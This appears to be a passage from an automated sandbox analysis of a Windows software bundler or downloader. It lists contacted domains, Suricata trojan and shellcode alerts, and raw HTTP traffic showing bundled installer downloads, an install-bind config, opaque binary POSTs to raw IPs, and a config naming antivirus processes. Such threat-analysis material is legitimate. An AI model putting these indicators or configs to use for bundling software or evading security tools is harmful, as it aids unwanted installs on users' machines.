| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=SogouExplorer&weight=1&scheme=e&rand=1463641996 | |
| hxxp://163.177.79.152:80/ | |
| hxxp://t.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 | |
| hxxp://img04.sogoucdn.com/app/a/10190001/741430117543639 | |
| hxxp://xz.sogou.com/js/jquery-1.11.1.min.js | |
| hub5idx.shub.hz.sandai.net | |
| hub5pr.hz.sandai.net | |
| pmap.hz.sandai.net | |
| hub5c.hz.sandai.net | |
| hub5pn.hz.sandai.net | |
| hub5u.hz.sandai.net | |
| relay.phub.hz.sandai.net | |
| hub5p.hz.sandai.net | |
| master.etl.desktop.qq.com | |
| hubstat.sandai.net | |
| time.windows.com | |
| hubstat.hz.sandai.net | |
| hub5sr.shub.hz.sandai.net | |
| hub5pnc.hz.sandai.net | |
| score.phub.hz.sandai.net | |
| imhub5pr.hz.sandai.net | |
| c.pc.qq.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Suspicious User-Agent (HttpDownload)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8619057-8619213
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1065841-1701145
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:34 GMT
Content-Type: application/octet-stream
Content-Length: 635305
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1065841-1701145/11709528
<<< skipped >>>
POST / HTTP/1.1
Host: 58.254.134.207:80
Content-type: application/octet-stream
Content-Length: 140
Connection: Keep-Alive
A............'....Wr.U..X.y.d..C.._p.T.!.b..s..7.......[...&...D..b.&.."..u\A...... .....4..z.[H.......o%M....B7..44".6..%..S.......Q.....N
HTTP/1.1 200 OK
Content-Length: 44
Content-Type: application/octet-stream
Connection: Close
A....... ........7N1O...=.G.....v.Zh.....4..
GET /cooperation/popuprecommend/installfinishbind-qqbrowser.xml HTTP/1.1
User-Agent: HttpRequest
Host: yze.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 200 OK
Date: Thu, 19 May 2016 04:36:32 GMT
Content-Type: text/xml
ETag: "467858975"
Accept-Ranges: bytes
Last-Modified: Wed, 06 Jan 2016 03:10:41 GMT
Vary: Accept-Encoding
Content-Length: 3306
Server: WS CDN Server
Age: 9396
Via: 1.0 db80:82 (Cdn Cache Server V2.0)
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<DOCUMENT>
  <bindtype><![CDATA[installfinishbind]]></bindtype>
  <item>
    <weight><![CDATA[0]]></weight>
    <name><![CDATA[QQBrowser]]></name>
    <appcheckurl><![CDATA[hXXp://t.sogou.com/update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0]]></appcheckurl>
    <appcheckreporturl><![CDATA[hXXp://t.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1]]></appcheckreporturl>
    <silentinstall><![CDATA[false]]></silentinstall>
    <installprivilege><![CDATA[false]]></installprivilege>
    <installtype><![CDATA[installpackage]]></installtype>
    <installedfeature>
      <type><![CDATA[keyandpath]]></type>
      <key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQBrowser]]></key>
      <valuename><![CDATA[Exe]]></valuename>
      <file><![CDATA[]]></file>
    </installedfeature>
    <installedfeature>
      <type><![CDATA[keyandpath]]></type>
      <key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Tencent\QQBrowser]]></key>
      <valuename><![CDATA[Exe]]></valuename>
      <file><![CDATA[]]></file>
    </installedfeature>
    <installpackage>
      <url><![CDATA[hXXp://dldl.qq.com/dl/sogoudl]]></url&<<< skipped >>>
GET /appinfo?num=13897 HTTP/1.1
User-Agent: HttpDownload
Host: yz.app.sogou.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:44 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: IPLOC=UA; expires=Fri, 19-May-17 07:12:44 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=DA60F2C28460900A00000000573D676C; expires=Wed, 14-May-36 07:12:44 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
25d
status=true&softurl=http://wap.sogou.com/web/redir.jsp%3Fappdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filename=WiFi-2175.exe&extra=9_pconline&downloadtype=software&iconurl=http://imgstore.cdn.sogou.com/v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=http://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg&softname=WiFi共享大师&softsize=11.2 MB
0
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:27 GMT
Content-Type: application/octet-stream
Content-Length: 11709528
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Accept-Ranges: bytes
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=5912223-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 5797305
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 5912223-11709527/11709528
<<< skipped >>>
GET /ie-css3.htc HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Length: 11952
Connection: keep-alive
ETag: "AVYcdCtTP6x"
Last-Modified: Tue, 17 May 2016 07:16:19 GMT
Accept-Ranges: bytes
<<< skipped >>>
GET /img/recommend-btn.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f
The URL has moved <a href="hXXp://xz.sogou.com/error">here</a>
0
GET /img/recommend-btn.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f
The URL has moved <a href="hXXp://xz.sogou.com/error">here</a>
0
POST /ajax/loadItem HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: hXXp://xz.sogou.com/softRecommend
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Content-Length: 9
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
classId=1
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<<< skipped >>>
GET /softassis/img/ranking-ico.png HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5945803-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /invc/xfspeed/qqpcmgr/download/SuiteDownloader20160222153349.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dlied6.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nws_4.2.1_midcache
Last-Modified: Mon, 22 Feb 2016 07:33:50 GMT
Content-Type: application/octet-stream
Content-Length: 2713888
X-Cache-Lookup: Hit From Disktank
Cache-Control: max-age=600
Expires: Thu, 19 May 2016 07:23:08 GMT
Date: Thu, 19 May 2016 07:13:08 GMT
Connection: keep-alive
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8701287
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXh0000o30f--&unc=sogousoftware_normal&t=10&rand=1463641970 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:45 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5912222
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-11709527
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 HTTP/1.1
User-Agent: HttpRequest
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Ruleid: 54d3460c179ca2b2069ae8f3
2b6
[ApplicationDownload]
PcidList=129794242533708274,-8508403418902118078,5776654418032372937,2040683535505104749,-1535177867968962755,2199435495537663854,8623308865128809051
NameList=3.6.0..[hQkS.X,[email protected],.3.6.0..g..Om..hV,.3.6.0..[hQOm..hV,.3.6.0.Kb:g.RKb5u..Hr,.~v.^kS.X,..d.rOm..hV
[ApplicationRun]
ProcessList=360Tray.exe,360sd.exe,360chrome.exe,360se.exe,360MobileMgr.exe,BaiduAnTray.exe
0
GET /update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 HTTP/1.1
User-Agent: HttpDownload
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3
54d3460c179ca2b2069ae8f3<br/>
GET /update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 HTTP/1.1
User-Agent: HttpRequest
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Ruleid: 54d3460c179ca2b2069ae8f3
2b6
[ApplicationDownload]
PcidList=129794242533708274,-8508403418902118078,5776654418032372937,2040683535505104749,-1535177867968962755,2199435495537663854,8623308865128809051
NameList=3.6.0..[hQkS.X,[email protected],.3.6.0..g..Om..hV,.3.6.0..[hQOm..hV,.3.6.0.Kb:g.RKb5u..Hr,.~v.^kS.X,..d.rOm..hV
[ApplicationRun]
ProcessList=360Tray.exe,360sd.exe,360chrome.exe,360se.exe,360MobileMgr.exe,BaiduAnTray.exe
0
GET /update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 HTTP/1.1
User-Agent: HttpDownload
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3
54d3460c179ca2b2069ae8f3<br/>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
POST / HTTP/1.1
Host: 163.177.79.152:80
Content-type: application/octet-stream
Content-Length: 92
Connection: Keep-Alive
<.......P...|...(...TLQ.j....W.......{..`t.\.V.{>X.G........P..`.Q'.}....!/.....<...I53....
HTTP/1.1 200 OK
Content-Length: 60
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=7220069-7373409
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8508097-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 3201431
